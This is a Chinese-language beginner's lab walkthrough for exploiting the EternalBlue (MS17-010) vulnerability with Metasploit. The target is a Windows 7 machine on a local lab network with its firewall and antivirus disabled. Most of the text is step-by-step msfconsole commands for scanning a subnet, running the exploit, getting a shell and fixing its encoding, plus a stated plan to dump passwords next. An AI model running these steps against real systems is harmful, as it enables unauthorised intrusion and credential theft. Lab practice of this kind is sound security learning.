一、实验环境:
kali :192.168.0.109
win7: 192.168.0.105
注:① net模式也可以。我这里网络模式为桥接,即与本机在同一个网段。 当由net切换到桥接时,kali会断网。可以参照下面的方法。https://blog.csdn.net/gw_csdn/article/details/84992696
② win7关闭防火墙,并且关闭杀软。(刚开始学,要求不高)
二、步骤
0x1
kali启动 msfconsole
0x2
因为 永恒之蓝漏洞编号是ms17-010 ,所以在msf中搜索利用框架。
执行 search ms17-010
0x3
切换到搜索模块
use auxiliary/scanner/smb/smb_ms17_010
0x4
查看配置选项
show options
0x5
设置扫描的网段。 这里在实验环境中,扫描 192.168.0.100-150
set rhosts 192.168.0.100-150
0x6
设置线程,提高速度
set threads 100
0x7
执行 run ,开始扫描
0x8
检测到了带有漏洞的靶机,现在就利用攻击模块
use exploit/windows/smb/ms17_010_eternalblue (tab键都可以补全)
0x9
查看配置选项
show options
0x10
设置攻击对象。
set rhosts 192.168.0.105
0x11
执行一遍检查 check
0x12
执行 run。拿下。
试试进入 shell
可以进入,但是乱码了。乱码的问题可以用下面的命令解决
chcp 65001
能直接进命令行了,那么接下来就是导出密码,开启端口,远程连接了。目前能力有限。后面补上。
交流qq:2368079178